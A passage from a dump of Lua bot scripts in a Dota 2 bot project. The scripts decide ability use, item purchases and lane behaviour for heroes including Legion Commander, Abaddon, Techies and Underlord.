marchLoc)\n\t\t\t\t\tend\n\t\t\t\telse\n\t\t\t\t\tnpcBot:Action_MoveToLocation(marchLoc)\n\t\t\t\tend\n\t\t\t\tsequence = 6\n\t\t\telseif numCreeps == 0 and frontDist >= 2000 and not npcBot:IsChanneling() then\n\t\t\t\tsequence = 3\n\t\t\telseif numCreeps == 0 and frontDist < 2000 and not npcBot:IsChanneling() then\n\t\t\t\tprint(\"5: Too Far From Creeps, Walking\")\n\t\t\t\tnpcBot:Action_MoveToLocation(frontLoc)\n\t\t\telseif laser:IsFullyCastable() and botMana >= (laserMana + bootsMana) and numCreeps > 0 and numCreeps < 2 and not npcBot:IsChanneling() then\n\t\t\t\tprint(\"5: Not Enough Creeps Around, Casting Laser\")\n\t\t\t\tnpcBot:Action_UseAbilityOnEntity(laser, nearbyCreeps[1])\n\t\t\telseif botMana < (marchMana + bootsMana) then\n\t\t\t\tprint(\"5: No Mana, Moving On\")\n\t\t\t\tsequence = 6\n\t\t\tend\n\t\t-- Cast March Again Or Move On\n\t\telseif sequence == 6 then\n\t\t\tif march:IsFullyCastable() and numCreeps > 1 and botMana >= (marchMana + bootsMana) and not npcBot:IsChanneling() then\n\t\t\t\tprint(\"6: Casting March Again\")\n\t\t\t\tnpcBot:Action_UseAbilityOnLocation(march, nearbyCreeps[1]:GetLocation())\n\t\t\t\tsequence = 7\n\t\t\telseif not march:IsFullyCastable() and numCreeps > 1 and botMana >= (marchMana + bootsMana) and not npcBot:IsChanneling() then\n\t\t\t\tnpcBot:Action_UseAbility(rearm)\n\t\t\telse\n\t\t\t\tsequence = 7\n\t\t\tend\n\t\t-- Rearm And Start Over\n\t\telseif sequence == 7 then\n\t\t\tif rearm:IsFullyCastable() and not npcBot:IsChanneling() then\n\t\t\t\tprint(\"7: REARMING!\")\n\t\t\t\tnpcBot:Action_UseAbility(rearm)\n\t\t\t\tprint(\"7: Back To 0\")\n\t\t\t\tsequence = 0\n\t\t\tend\n\t\tend\n\telseif gameTime < 0 then\n\t\tnpcBot:Action_MoveToLocation(GetTower(botTeam, TOWER_MID_1):GetLocation() + RandomVector(200))\n\tend\nend\n"
},
{
"alpha_fraction": 0.6371167898178101,
"alphanum_fraction": 0.6487158536911011,
"avg_line_length": 32.79600143432617,
"blob_id": "3f9afcff2eee952b7da2a87248222f0993ec425a",
"content_id": "1999bae142186be77be2091fa3c9731162fdc23f",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Lua",
"length_bytes": 8449,
"license_type": "no_license",
"max_line_length": 126,
"num_lines": 250,
"path": "/ability_item_usage_legion_commander.lua",
"repo_name": "vpus/vpesports-enhanced-bot",
"src_encoding": "UTF-8",
"text": "local build = require(GetScriptDirectory()..\"/item_build_legion_commander\")\nrequire(GetScriptDirectory()..\"/UtilityData\")\nrequire(GetScriptDirectory()..\"/UtilityFunctions\")\n\nlocal npcBot = GetBot()\nlocal botTeam = GetTeam()\nlocal lane_claim = true\n\nnpcBot.duel = false\nnpcBot.target = nil\nnpcBot.blink = false\nnpcBot.press = false\n\nlocal odds = npcBot:GetAbilityByName(\"legion_commander_overwhelming_odds\")\nlocal press = npcBot:GetAbilityByName(\"legion_commander_press_the_attack\")\nlocal courage = npcBot:GetAbilityByName(\"legion_commander_moment_of_courage\") \nlocal duel = npcBot:GetAbilityByName(\"legion_commander_duel\")\n\nfunction BuybackUsageThink()end\n\nfunction AbilityLevelUpThink()\n\tlocal skillsToLevel = build[\"skills\"]\n\tif npcBot:GetAbilityPoints() > 0 and skillsToLevel[1] ~= nil then\n\t\tnpcBot:ActionImmediate_LevelAbility(skillsToLevel[1])\n\t\ttable.remove(skillsToLevel, 1)\n\tend\nend\n\n-- Logic for all Ability Usage behavior\nfunction AbilityUsageThink()\n\t-- Stats\n\tlocal botMana = npcBot:GetMana()\n\tlocal botMaxMana = npcBot:GetMaxMana()\n\tlocal botHP = npcBot:GetHealth()\n\tlocal botMaxHP = npcBot:GetMaxHealth()\n\tlocal botLevel = npcBot:GetLevel()\n\tlocal mode = npcBot:GetActiveMode()\n\tlocal action = npcBot:GetCurrentActionType()\n\tlocal allyList = GetUnitList(UNIT_LIST_ALLIES)\n\tlocal botMode = npcBot:GetActiveMode()\n\n\t-- Nearby Units\n\tlocal allies = npcBot:GetNearbyHeroes(1000, false, BOT_MODE_NONE)\n\tlocal enemies = npcBot:GetNearbyHeroes(1000, true, BOT_MODE_NONE)\n\tlocal enemyCreeps = npcBot:GetNearbyLaneCreeps(1000, true)\n\tlocal allyCreeps = npcBot:GetNearbyLaneCreeps(1000, false)\n\tlocal neutrals = npcBot:GetNearbyNeutralCreeps(1000)\n\t\n\tlocal numAllies = table.getn(allies)\n\tlocal numEnemies = table.getn(enemies)\n\tlocal numEnemyCreeps = table.getn(enemyCreeps)\n\tlocal numAllyCreeps = table.getn(allyCreeps)\n\tlocal numNeutrals = table.getn(neutrals)\n\n\t-- OVERWHELMING ODDS Usage\n\tif odds:IsCooldownReady() and action ~= BOT_ACTION_TYPE_USE_ABILITY then\n\t\tlocal totalEnemies = numEnemies * 2 + numEnemyCreeps\n\t\t-- MANGO\n\t\tif odds:GetLevel() > 1 then\n \t\tlocal mangoLoc = npcBot:FindItemSlot(\"item_enchanted_mango\")\n local mango = nil\n if npcBot:GetItemSlotType(mangoLoc) == ITEM_SLOT_TYPE_MAIN then\n mango = npcBot:GetItemInSlot(mangoLoc)\n end\n \n if mango ~= nil and botMana < 100 and botLevel > 1 then\n \tnpcBot:Action_UseAbility(mango)\n end\n end\n \n useSoulRing()\n \n\t\tif totalEnemies >= 4 then\n\t\t\tlocal enemyLocs = {}\n\t\t\t\n\t\t\tfor e = 1, numEnemies do\n\t\t\t\ttable.insert(enemyLocs, enemies[e]:GetLocation())\n\t\t\tend\n\t\t\n\t\t\tfor c = 1, numEnemyCreeps do\n\t\t\t\ttable.insert(enemyLocs, enemyCreeps[c]:GetLocation())\n\t\t\tend\n\t\t\t\n\t\t\tlocal centroid = _G.getCentroid(enemyLocs)\n\t\t\tnpcBot:Action_UseAbilityOnLocation(odds, centroid)\n\t\telseif mnode == BOT_MODE_ATTACK then\n\t\t\tif numEnemies > 0 then\n\t\t\t\tnpcBot:Action_UseAbilityOnLocation(odds, enemies[1]:GetLocation())\n\t\t\tend\n\t\tend\n\tend\n\n\t-- PRESS THE ATTACK Usage\n if press:IsFullyCastable() and action ~= BOT_ACTION_TYPE_USE_ABILITY then\n local shield_cast = false\n local shield_target = npcBot\n local shield_target_health = npcBot:GetHealth()\n local nearbyAllies = npcBot:GetNearbyHeroes(1000, false, BOT_MODE_NONE)\n local nearbyEnemies_675 = npcBot:GetNearbyHeroes(675, true, BOT_MODE_NONE)\n for j, ally in pairs(nearbyAllies) do\n if ally:GetHealth() < shield_target:GetHealth() and (ally:GetHealth()*1.5 < botHP or ally:GetHealth() < 500 ) then\n shield_target = ally\n end\n end\n\n if press:GetLevel() == 1 then\n if shield_target_health < 200 and #nearbyEnemies_675 > 0 then\n shield_cast = true\n end\n else\n if botMode == BOT_MODE_RETREAT or botMode == BOT_MODE_ATTACK and numEnemies > 0 then\n shield_cast = true\n else\n for j,enemy in pairs(enemies) do\n if enemy:GetAttackTarget() == npcBot and botHP < botMaxHP - 150 then\n shield_cast = true\n break\n end\n end\n end\n end\n\n -- Press cast --\n if shield_cast and not npcBot:HasModifier(\"modifier_fountain_aura_buff\") then\n print(\"Use Shield on \" .. tostring(shield_target:GetUnitName()))\n npcBot:Action_UseAbilityOnEntity(press, shield_target)\n end\n end\n\t\n\t-- DUEL Usage\n\tif duel:IsFullyCastable() and action ~= BOT_ACTION_TYPE_USE_ABILITY then\n\t\tlocal target = nil\n\t\t\n\t\tlocal botHP = npcBot:GetHealth()\n\t\tlocal botArmor = npcBot:GetArmor()\n\t\tlocal botAttack = npcBot:GetAttackDamage()\n\t\tlocal botMult = getArmorMultiplier(botArmor)\n\t\tlocal botDamage = botAttack * botMult\n\t\t\n\t\tlocal botKill = 0\n\t\tlocal enemyKill = 5000\n\t\t\n\t\tfor e = 0, numEnemies do\n\t\t\tlocal enemy = enemies[e]\n\t\t\t\n--\t\t\tif enemy ~= nil then\n--\t\t\t\tlocal hp = enemy:GetHealth()\n--\t\t\t\tlocal armor = enemy:GetArmor()\n--\t\t\t\tlocal attack = enemy:GetEvasion()\n--\t\t\t\tlocal multiplier = getArmorMultiplier(armor)\n--\t\t\t\tlocal damage = attack * multiplier\n--\t\t\t\tlocal toKillBot = botHP / damage\n--\t\t\t\tlocal toKillEnemy = hp / botDamage\n--\t\t\t\t\n--\t\t\t\tif botKill < toKillBot and enemyKill > toKillEnemy then\n\t\t\t\t\ttarget = enemy\n--\t\t\t\tend\n--\t\t\tend\n\t\tend\n\t\t\n\t\tif target ~= nil then\n local blinkLoc = npcBot:FindItemSlot(\"item_blink\")\n local blink = nil\n if npcBot:GetItemSlotType(blinkLoc) == ITEM_SLOT_TYPE_MAIN then\n blink = npcBot:GetItemInSlot(blinkLoc)\n end\n \n npcBot.duel = true\n npcBot.target = target\n print(\"Dueling: \" .. target:GetUnitName())\n if blink ~= nil and not npcBot.blink then\n \tnpcBot:ActionQueue_UseAbilityOnLocation(blink, target:GetLocation())\n \tnpcBot.blink = true\n end\n if npcBot.duel then\n\t\t\t\tnpcBot:ActionQueue_UseAbilityOnEntity(duel, target)\n\t\t\tend\n\t\telseif target == nil or npcBot:HasModifier(\"modifier_legion_commander_duel\") then\n\t\t\tnpcBot.duel = false\n\t\t\tnpcBot.target = nil\n\t\t\tnpcBot.blink = false\n\t\t\tnpcBot.press = false\n\t\tend\n\tend\n\t\n\t-- PRESS THE ATTACK Usage\n\tif npcBot.duel and press:IsFullyCastable() then\n\t\tlocal targetDist = GetUnitToUnitDistance(npcbot, target)\n\t\tlocal blinkLoc = npcBot:FindItemSlot(\"item_blink\")\n local blink = nil\n if npcBot:GetItemSlotType(blinkLoc) == ITEM_SLOT_TYPE_MAIN then\n blink = npcBot:GetItemInSlot(blinkLoc)\n end\n\t\t\n\t\tif targetDist <= 250 or blink ~= nil and not npcBot.press then\n\t\t\tnpcBot:ActionPush_UseAbilityOnEntity(press, npcBot)\n\t\t\tnpcBot.press = true\n\t\tend\n\tend\n\t\n if (mode == BOT_MODE_ATTACK \n or mode == BOT_MODE_RETREAT \n or mode == BOT_MODE_EVASIVE_MANEUVERS) then\n local wandSlot = npcBot:FindItemSlot(\"item_magic_wand\")\n local wand = nil\n if npcBot:GetItemSlotType(wandSlot) == ITEM_SLOT_TYPE_MAIN then\n wand = npcBot:GetItemInSlot(wandSlot)\n end\n if wand ~= nil and (wand:GetCurrentCharges() > 10 or botHP < 100 or botMana < 100) then\n if wand:IsFullyCastable() then\n npcBot:Action_UseAbility(wand)\n end\n end\n end\nend\n\nfunction useSoulRing()\n\tlocal botMana = npcBot:GetMana()\n\tlocal botHP = npcBot:GetHealth()\n\t-- SOUL RING Usage\n local soulLoc = npcBot:FindItemSlot(\"item_soul_ring\")\n local soul = nil\n if npcBot:GetItemSlotType(soulLoc) == ITEM_SLOT_TYPE_MAIN then\n soul = npcBot:GetItemInSlot(soulLoc)\n end\n if soul ~= nil then\n if soul:IsFullyCastable() and botMana < 200 and botHP > 400 then\n npcBot:Action_UseAbility(soul)\n end\n end\nend\n\nfunction getArmorMultiplier(armor)\n\treturn 1 - (0.05 * armor / (1 + 0.05 * math.abs(armor)))\nend\n\nfunction BuybackUsageThink()\n if DotaTime() < -30 and lane_claim then\n local lane_id = npcBot:GetAssignedLane()\n if lane_id == 1 then\n npcBot:ActionImmediate_Chat(\"I'm going Top!\", false)\n elseif lane_id == 2 then\n npcBot:ActionImmediate_Chat(\"I'm going Mid!\", false)\n elseif lane_id == 3 then\n npcBot:ActionImmediate_Chat(\"I'm going Bot!\", false)\n end\n lane_claim = false\n end\n return\nend\n"
},
{
"alpha_fraction": 0.7012647390365601,
"alphanum_fraction": 0.7034452557563782,
"avg_line_length": 34,
"blob_id": "267caabcee92d4d808255d89cf98adf37abc6e89",
"content_id": "c5a0c3c9d5d1eb2ded78d60ead3b3ef76de425cc",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Lua",
"length_bytes": 4586,
"license_type": "no_license",
"max_line_length": 243,
"num_lines": 131,
"path": "/item_purchase_techies.lua",
"repo_name": "vpus/vpesports-enhanced-bot",
"src_encoding": "UTF-8",
"text": "local npcBot = GetBot()\n\nlocal purchase = require(GetScriptDirectory() .. \"/item_build_techies\");\n\nlocal itemsPurchase = purchase[\"items\"]\nlocal boughtClarity = false\nlocal boughtSalve = false\nlocal clarityCount = 0\n\nfunction ItemPurchaseThink()\n--\tif GetGameState() ~= GAME_STATE_PRE_GAME and GetGameState() ~= GAME_STATE_GAME_IN_PROGRESS then\n--\t\treturn;\n--\tend\n\t\n\tlocal botHP = npcBot:GetHealth()\n\tlocal botMaxHP = npcBot:GetMaxHealth()\n\tlocal botMana = npcBot:GetMana()\n\tlocal botMaxMana = npcBot:GetMaxMana()\n\t\n\tlocal clarity = nil\n\tlocal bottle = nil\n\tlocal salve = nil\n\tlocal boots = nil\n\tlocal arcane = nil\n\t\n\tlocal clarityLoc = npcBot:FindItemSlot(\"item_clarity\")\n\tlocal bottleLoc = npcBot:FindItemSlot(\"item_bottle\")\n\tlocal salveLoc = npcBot:FindItemSlot(\"item_salve\")\n\tlocal bootsLoc = npcBot:FindItemSlot(\"item_travel_boots\")\n\tlocal arcaneLoc = npcBot:FindItemSlot(\"item_arcane_boots\")\n\t\n\tif npcBot:GetItemSlotType(clarityLoc) == ITEM_SLOT_TYPE_MAIN then\n\t\tclarity = npcBot:GetItemInSlot(clarityLoc)\n\tend\n\tif npcBot:GetItemSlotType(bottleLoc) == ITEM_SLOT_TYPE_MAIN then\n\t\tbottle = npcBot:GetItemInSlot(bottleLoc)\n\tend\n\tif npcBot:GetItemSlotType(salveLoc) == ITEM_SLOT_TYPE_MAIN then\n\t\tsalve = npcBot:GetItemInSlot(salveLoc)\n\tend\n\tif npcBot:GetItemSlotType(bootsLoc) == ITEM_SLOT_TYPE_MAIN then\n\t\tboots = npcBot:GetItemInSlot(bootsLoc)\n\tend\n\t\n\tif npcBot:HasModifier(\"modifier_flask_healing\") then\n\t\tboughtSalve = false\n\tend\n\tif npcBot:HasModifier(\"modifier_clarity_potion\") then\n\t\tboughtClarity = false\n\tend\n\tif npcBot:GetItemSlotType(arcaneLoc) == ITEM_SLOT_TYPE_MAIN then\n\t\tarcane = npcBot:GetItemInSlot(arcaneLoc)\n\tend\n\t\n\tif arcane == nil then\n \tif (botMana < npcBot:GetAbilityByName(\"techies_remote_mines\"):GetManaCost()) and npcBot:IsAlive() and arcane == nil then\n \t\tif clarityCount < 4 and not boughtClarity and (bottle == nil or bottle:GetCurrentCharges() == 0) and clarity == nil and not npcBot:HasModifier(\"modifier_clarity_potion\") and npcBot:GetItemSlotType(bootsLoc) == ITEM_SLOT_TYPE_INVALID then\n \t\tlocal result = npcBot:ActionImmediate_PurchaseItem(\"item_clarity\")\n \t\tif result == PURCHASE_ITEM_SUCCESS then\n \t\t\tboughtClarity = true\n \t\t\tclarityCount = clarityCount + 1\n \t\tend\n \tend\n end\n \t\n-- \tif (botHP/botMaxHP < 0.2) and npcBot:IsAlive() then\n-- \t\tif not boughtSalve and salve == nil and not npcBot:HasModifier(\"modifier_flask_healing\") then\n-- \tlocal result = npcBot:ActionImmediate_PurchaseItem(\"item_flask\")\n-- \tif result == PURCHASE_ITEM_SUCCESS then\n-- \t\tboughtSalve = true\n-- \tend\n-- \t\tend\n-- \tend\n\tend\n\n\tlocal itemIndex = nil\n\t\n\tfor i = 1, #itemsPurchase do\n\t\tif itemsPurchase[i] ~= \"none\" then\n\t\t\titemIndex = i\n\t\t\tbreak\n\t\tend\n\tend\n\t\n\tif itemIndex == nil then\n\t\treturn\n\tend\n\t\n\tlocal botGold = npcBot:GetGold()\n\tlocal itemCost = GetItemCost(itemsPurchase[itemIndex])\n\t\n\tif botGold >= itemCost then\n\t\tlocal sideShop = IsItemPurchasedFromSideShop(itemsPurchase[itemIndex])\n\t\tlocal secretShop = IsItemPurchasedFromSecretShop(itemsPurchase[itemIndex])\n\t\tlocal sideShopDistance = npcBot:DistanceFromSideShop()\n\t\tlocal secretShopDistance = npcBot:DistanceFromSecretShop()\n\t\tlocal fountainDistance = npcBot:DistanceFromFountain()\n\t\t\n\t\tif secretShop then\n\t\t\tnpcBot.secretShop = true -- lets the secret shop mode know to switch\n\t\t\tif secretShopDistance == 0 then\n\t\t\t\tlocal result = npcBot:ActionImmediate_PurchaseItem(itemsPurchase[itemIndex])\n\t\t\t\tprint(\"Purchasing \" .. itemsPurchase[itemIndex] .. \": \" .. tostring(result))\n \t\t\tif result == PURCHASE_ITEM_SUCCESS then\n \t\t\t\titemsPurchase[itemIndex] = \"none\"\n \t\t\telse\n \t\t\t\tprint(\" Item Not Purchased: \" .. tostring(result) .. \" : \" .. tostring(itemsPurchase[itemIndex]))\n \t\t\tend\n\t\t\tend\n\t\telseif not secretShop then\n\t\t\tlocal result = npcBot:ActionImmediate_PurchaseItem(itemsPurchase[itemIndex])\n\t\t\tprint(\"Purchasing \" .. itemsPurchase[itemIndex] .. \": \" .. tostring(result))\n\t\t\tif result == PURCHASE_ITEM_SUCCESS then\n\t\t\t\titemsPurchase[itemIndex] = \"none\"\n\t\t\telse\n\t\t\t\tprint(\" Item Not Purchased: \" .. tostring(result) .. \" : \" .. tostring(itemsPurchase[itemIndex]))\n\t\t\tend\n\t\tend\n\tend\n\t\n\tif npcBot:GetStashValue() > 0 then\n\t\tlocal courier = GetCourier(0)\n\t\tlocal state = GetCourierState(courier)\n\t\t\n\t\tif courier ~= nil then\n\t\t\tif state == COURIER_STATE_IDLE or state == COURIER_STATE_AT_BASE and npcBot:IsAlive() then\n\t\t\t\tnpcBot:ActionImmediate_Courier(courier, COURIER_ACTION_TAKE_AND_TRANSFER_ITEMS)\n\t\t\tend\n\t\tend\n\tend\nend\t\n"
},
{
"alpha_fraction": 0.7337164878845215,
"alphanum_fraction": 0.7375478744506836,
"avg_line_length": 26.473684310913086,
"blob_id": "9855b69fc586674107a4f1c21ba9a434eaec3007",
"content_id": "b7451e99face8cb971c175a53b7f92206dba7bce",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Lua",
"length_bytes": 522,
"license_type": "no_license",
"max_line_length": 64,
"num_lines": 19,
"path": "/mode_laning_lone_druid.lua",
"repo_name": "vpus/vpesports-enhanced-bot",
"src_encoding": "UTF-8",
"text": "require(GetScriptDirectory()..\"/UtilityData\")\nrequire(GetScriptDirectory()..\"/UtilityFunctions\")\n\nlocal npcBot = GetBot()\nlocal botTeam = GetTeam()\nlocal botLocArray = {}\n\nfunction GetDesire()\n\tlocal gameTime = DotaTime()\n\tlocal mode = npcBot:GetActiveMode()\n\tlocal modeDesire = npcBot:GetActiveModeDesire()\n\tlocal aghaSlot = npcBot:FindItemSlot(\"item_ultimate_scepter\")\n\t\n\tif npcBot:GetItemSlotType(aghaSlot) == ITEM_SLOT_TYPE_MAIN then\n\t\treturn _G.desires[1]\n\tend\n--\tprint(gameTime)\n\treturn _G.desires[6]\nend\n"
},
{
"alpha_fraction": 0.5131633877754211,
"alphanum_fraction": 0.534475564956665,
"avg_line_length": 23.9375,
"blob_id": "47313c98da90c5976964c98e1bf2f26db880887c",
"content_id": "71fe06e10ce17494b2dfb70ff8c12963832e438e",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Lua",
"length_bytes": 2393,
"license_type": "no_license",
"max_line_length": 62,
"num_lines": 96,
"path": "/item_build_abyssal_underlord.lua",
"repo_name": "vpus/vpesports-enhanced-bot",
"src_encoding": "UTF-8",
"text": "X = {}\nrequire(GetScriptDirectory() .. \"/UtilityFunctions\")\nlocal npcBot = GetBot()\nlocal talents = fillTalentTable(npcBot)\n\nX[\"items\"] = {\n -- start --\n\t\"item_stout_shield\",\n \"item_flask\",\n \"item_tango\",\n \"item_enchanted_mango\",\n -- arcane boots --\n \"item_boots\",\n \"item_energy_booster\",\n -- magic wand --\n \"item_magic_stick\",\n \"item_branches\",\n \"item_branches\",\n -- Soul Ring --\n \"item_ring_of_regen\",\n \"item_gauntlets\",\n \"item_gauntlets\",\n \"item_recipe_soul_ring\",\n -- vanguard --\n \"item_ring_of_health\",\n \"item_vitality_booster\",\n -- Hood of Defiance --\n \"item_ring_of_health\",\n \"item_cloak\",\n \"item_ring_of_regen\",\n -- Pipe of Insight --\n \"item_ring_of_regen\",\n \"item_branches\",\n \"item_recipe_headdress\",\n \"item_recipe_pipe\",\n -- Crimson Guard --\n \"item_chainmail\",\n \"item_branches\",\n \"item_recipe_buckler\",\n \"item_recipe_crimson_guard\",\n -- Mekansm --\n \"item_ring_of_regen\",\n \"item_branches\",\n \"item_recipe_headdress\",\n \"item_chainmail\",\n \"item_branches\",\n \"item_recipe_buckler\",\n \"item_recipe_mekansm\",\n -- Guardian Greaves --\n \"item_recipe_guardian_greaves\",\n -- Blink Dagger --\n \"item_blink\",\n -- Blade Mail --\n \"item_broadsword\",\n \"item_chainmail\",\n \"item_robe\",\n -- Shiva's Guard --\n \"item_platemail\",\n \"item_mystic_staff\",\n \"item_recipe_shivas_guard\",\n}\n\nlocal firestorm = \"abyssal_underlord_firestorm\"\nlocal pit_of_malice = \"abyssal_underlord_pit_of_malice\"\nlocal atrophy_aura = \"abyssal_underlord_atrophy_aura\"\nlocal dark_rift = \"abyssal_underlord_dark_rift\"\nlocal cancel_dark_rift = \"abyssal_underlord_cancel_dark_rift\"\n\nX[\"skills\"] = {\n atrophy_aura, --1\n firestorm, --2 \n firestorm, --3\n atrophy_aura, --4\n firestorm, --5\n dark_rift, --6\n firestorm, --7\n pit_of_malice, --8\n pit_of_malice, --9\n talents[3], --10\n pit_of_malice, --11\n dark_rift, --12\n pit_of_malice, --13\n atrophy_aura, --14\n talents[5], --15\n atrophy_aura, --16\n -- \"-1\", --17\n dark_rift, --18\n -- \"-1\", --19\n talents[6], --20\n -- \"-1\", \t --21\n -- \"-1\", \t --22\n -- \"-1\", --23\n -- \"-1\", --24\n talents[8], --25\n}\nreturn X"
},
{
"alpha_fraction": 0.5389426350593567,
"alphanum_fraction": 0.5486157536506653,
"avg_line_length": 38.58085632324219,
"blob_id": "5d464e04bcd69880376f0a33c94654b23be65d91",
"content_id": "f620e7b96a9b373133fc278e0498a27f7fe48c2b",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Lua",
"length_bytes": 11992,
"license_type": "no_license",
"max_line_length": 147,
"num_lines": 303,
"path": "/ability_item_usage_abaddon.lua",
"repo_name": "vpus/vpesports-enhanced-bot",
"src_encoding": "UTF-8",
"text": "local build = require(GetScriptDirectory()..\"/item_build_abaddon\")\nrequire(GetScriptDirectory()..\"/UtilityData\")\nrequire(GetScriptDirectory()..\"/UtilityFunctions\")\n\nlocal npcBot = GetBot()\nlocal botTeam = GetTeam()\nlocal lane_claim = true\nlocal UnderDarkRift = false\n\nfunction AbilityLevelUpThink()\n local skillsToLevel = build[\"skills\"]\n-- if npcBot:GetAbilityPoints() < 1 or (GetGameState() ~= GAME_STATE_PRE_GAME \n-- \tand GetGameState() ~= GAME_STATE_GAME_IN_PROGRESS) then\n-- return\n-- end\n -- for i, item in pairs(skillsToLevel) do\n -- print(i, item)\n -- end\n if npcBot:GetAbilityPoints() > 0 and skillsToLevel[1] ~= \"-1\" \n \tand skillsToLevel[1] ~= nil then\n -- print(npcBot:GetAbilityPoints(), skillsToLevel[1])\n \tnpcBot:ActionImmediate_LevelAbility(skillsToLevel[1])\n \ttable.remove(skillsToLevel, 1)\n end\nend\n\nfunction AbilityUsageThink()\n local botMana = npcBot:GetMana()\n local botHealth = npcBot:GetHealth()\n local botMaxHealth = npcBot:GetMaxHealth()\n local botMaxMana = npcBot:GetMaxMana()\n local bot_location_x = npcBot:GetLocation()[1]\n local bot_location_y = npcBot:GetLocation()[2]\n local action = npcBot:GetCurrentActionType()\n local action_mode = npcBot:GetActiveMode()\n\n local death_coil = npcBot:GetAbilityByName(\"abaddon_death_coil\")\n local aphotic_shield = npcBot:GetAbilityByName(\"abaddon_aphotic_shield\")\n\n local nearbyCreeps = npcBot:GetNearbyLaneCreeps(1000, true)\n local nearbyEnemies = npcBot:GetNearbyHeroes(1000, true, BOT_MODE_NONE)\n\n -- death coil think --\n ---- suicide death coil ----\n if death_coil:IsFullyCastable() then\n local coil_cast = false\n local coil_target = nil\n healthCost = death_coil:GetLevel()*25 + 50\n if botHealth < healthCost and #nearbyEnemies > 0 then\n local nearbyEnemies_800 = npcBot:GetNearbyHeroes(800, true, BOT_MODE_NONE)\n for j, enemy in pairs(nearbyEnemies_800) do\n if coil_target == nil then\n coil_target = enemy\n else\n if enemy:GetHealth() < coil_target:GetHealth() then\n coil_target = enemy\n end\n end\n end\n if coil_target == nil then\n local nearbyAllies_800 = npcBot:GetNearbyHeroes(800, false, BOT_MODE_NONE)\n for j, ally in pairs(nearbyAllies_800) do\n if coil_target == nil then\n coil_target = ally\n else\n if ally:GetHealth() < coil_target:GetHealth() then\n coil_target = ally\n end\n end\n end\n end\n if coil_target == nil then\n local nearbyCreeps_800 = npcBot:GetNearbyLaneCreeps(800, true)\n for j, creep in pairs(nearbyCreeps_800) do\n if coil_target == nil then\n coil_target = creep\n else\n if creep:GetHealth() < coil_target:GetHealth() then\n coil_target = creep\n end\n end\n end\n end\n if coil_target == nil then\n local nearbyCreeps_800 = npcBot:GetNearbyLaneCreeps(800, false)\n for j, creep in pairs(nearbyCreeps_800) do\n if coil_target == nil then\n coil_target = creep\n else\n if creep:GetHealth() < coil_target:GetHealth() then\n coil_target = creep\n end\n end\n end\n end\n if coil_target ~= nil then\n coil_cast = true\n end\n end\n ---- common death coil think ----\n if not coil_cast then\n if not npcBot:IsChanneling() then\n coil_damage = death_coil:GetAbilityDamage()\n for j, enemy in pairs(nearbyEnemies) do\n if coil_target == nil then\n coil_target = enemy\n else\n local enemyResist = enemy:GetMagicResist()\n local enemy_coil_damage = coil_damage*(1-enemyResist)\n if enemy:GetHealth() < enemy_coil_damage then\n coil_target = enemy\n coil_cast = true\n break\n elseif enemy:GetHealth() < coil_target:GetHealth() then\n coil_target = enemy\n end\n end\n end\n if not coil_cast then\n local nearbyAllies = npcBot:GetNearbyHeroes(1000, false, BOT_MODE_NONE)\n for j, ally in pairs(nearbyAllies) do\n if ally:GetHealth() < coil_target:GetHealth() and ally:GetHealth() < 500 then\n coil_target = ally\n end\n end\n end\n if (action_mode == BOT_MODE_LANING or action_mode == BOT_MODE_FARM or action_mode == BOT_MODE_PUSH_TOWER_TOP\n or action_mode == BOT_MODE_PUSH_TOWER_TOP or action_mode == BOT_MODE_PUSH_TOWER_MID or action_mode == BOT_MODE_PUSH_TOWER_BOT) then\n if coil_target == nil then\n local nearbyCreeps = npcBot:GetNearbyLaneCreeps(1000, true)\n for j, creep in pairs(nearbyCreeps) do\n local enemyResist = enemy:GetMagicResist()\n local enemy_coil_damage = coil_damage*(1-enemyResist)\n if creep:GetHealth() < enemy_coil_damage then\n coil_target = creep\n break\n end\n end\n end\n end\n if not coil_cast and coil_target ~= nil and coil_target ~= npcBot then\n if botHealth > 500 and #nearbyEnemies > 0 then\n coil_cast = true\n end\n end\n end\n end\n\n ---- death coil cast ----\n if coil_cast then\n print(\"Use Coil on \", coil_target:GetUnitName())\n npcBot:Action_UseAbilityOnEntity(death_coil, coil_target)\n end\n end\n\n -- aphotic shield --\n if aphotic_shield:IsFullyCastable() then\n local shield_cast = false\n local shield_target = npcBot\n local shield_target_health = npcBot:GetHealth()\n local nearbyAllies = npcBot:GetNearbyHeroes(1000, false, BOT_MODE_NONE)\n local nearbyEnemies_675 = npcBot:GetNearbyHeroes(675, true, BOT_MODE_NONE)\n for j, ally in pairs(nearbyAllies) do\n if ally:GetHealth() < shield_target:GetHealth() and (ally:GetHealth()*1.5 < botHealth or ally:GetHealth() < 500 ) then\n shield_target = ally\n end\n end\n\n if aphotic_shield:GetLevel() == 1 then\n if shield_target_health < 200 and #nearbyEnemies_675 > 0 then\n shield_cast = true\n end\n else\n if action_mode == BOT_MODE_RETREAT or action_mode == BOT_MODE_ATTACK and #nearbyEnemies > 0 then\n shield_cast = true\n else\n for j,enemy in pairs(nearbyEnemies) do\n if enemy:GetAttackTarget() == npcBot and botHealth < botMaxHealth - 150 then\n shield_cast = true\n break\n end\n end\n end\n end\n\n ---- aphotic shield cast ----\n if shield_cast and not npcBot:HasModifier(\"modifier_fountain_aura_buff\") then\n print(\"Use Shiled on \", shield_target:GetUnitName())\n npcBot:Action_UseAbilityOnEntity(aphotic_shield, shield_target)\n end\n end\n\n -- Hood of Defiance --\n if (action_mode == BOT_MODE_ATTACK \n or action_mode == BOT_MODE_RETREAT \n or action_mode == BOT_MODE_DEFEND_ALLY\n or action_mode == BOT_MODE_EVASIVE_MANEUVERS) then\n local hoodSlot = npcBot:FindItemSlot(\"item_hood_of_defiance\")\n local hood = nil\n if npcBot:GetItemSlotType(hoodSlot) == ITEM_SLOT_TYPE_MAIN then\n hood = npcBot:GetItemInSlot(hoodSlot)\n end\n if hood ~= nil then\n if hood:IsFullyCastable() then\n npcBot:Action_UseAbility(hood)\n end\n end\n end\n\n -- Pipe of Insight --\n if (action_mode == BOT_MODE_ATTACK \n or action_mode == BOT_MODE_RETREAT \n or action_mode == BOT_MODE_DEFEND_ALLY\n or action_mode == BOT_MODE_EVASIVE_MANEUVERS) then\n local pipeSlot = npcBot:FindItemSlot(\"item_pipe\")\n local pipe = nil\n if npcBot:GetItemSlotType(pipeSlot) == ITEM_SLOT_TYPE_MAIN then\n pipe 